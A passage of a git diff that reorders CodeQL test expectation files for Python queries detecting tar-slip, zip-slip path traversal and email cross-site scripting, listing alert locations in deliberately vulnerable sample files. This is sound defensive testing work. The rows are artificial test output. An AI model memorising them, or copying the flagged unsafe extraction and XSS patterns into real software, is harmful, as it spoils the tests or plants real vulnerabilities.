TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | -| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | -| TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | ControlFlowNode for members | -| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | -| TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | ControlFlowNode for result | -| TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | edges | TarSlipImprov.py:15:1:15:3 | ControlFlowNode for tar | TarSlipImprov.py:17:5:17:10 | ControlFlowNode for member | provenance | | | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:15:1:15:3 | ControlFlowNode for tar | provenance | | 
@@ -253,3 +223,33 @@ nodes subpaths | TarSlipImprov.py:39:65:39:67 | ControlFlowNode for tar | TarSlipImprov.py:26:21:26:27 | ControlFlowNode for tarfile | TarSlipImprov.py:36:12:36:17 | ControlFlowNode for result | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | | TarSlipImprov.py:39:65:39:67 | ControlFlowNode for tar | TarSlipImprov.py:26:21:26:27 | ControlFlowNode for tarfile | TarSlipImprov.py:36:12:36:17 | ControlFlowNode for result [List element] | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | +#select +| TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | ControlFlowNode for result | +| TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | ControlFlowNode for members_filter1() | +| TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | +| TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | ControlFlowNode for members | +| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | +| TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | ControlFlowNode for result | +| TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected index eecdfd0494fb..6b618335d810 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected 
@@ -1,9 +1,3 @@ -#select -| zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | file system operation | -| zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | file system operation | edges | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:36:8:39 | ControlFlowNode for zipf | provenance | | | zipslip_bad.py:8:36:8:39 | ControlFlowNode for zipf | zipslip_bad.py:10:13:10:17 | ControlFlowNode for entry | provenance | | 
@@ -42,3 +36,9 @@ nodes | zipslip_bad.py:35:9:35:9 | ControlFlowNode for x | semmle.label | ControlFlowNode for x | | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | semmle.label | ControlFlowNode for x | subpaths +#select +| zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | file system operation | +| zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | file system operation | 
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected index 0a7dde1b81de..8f0493b79278 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected 
@@ -1,18 +1,3 @@ -#select -| django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | a user-provided value | -| django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | a user-provided value | -| django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | a user-provided value | -| flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. 
| flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | Cross-site scripting 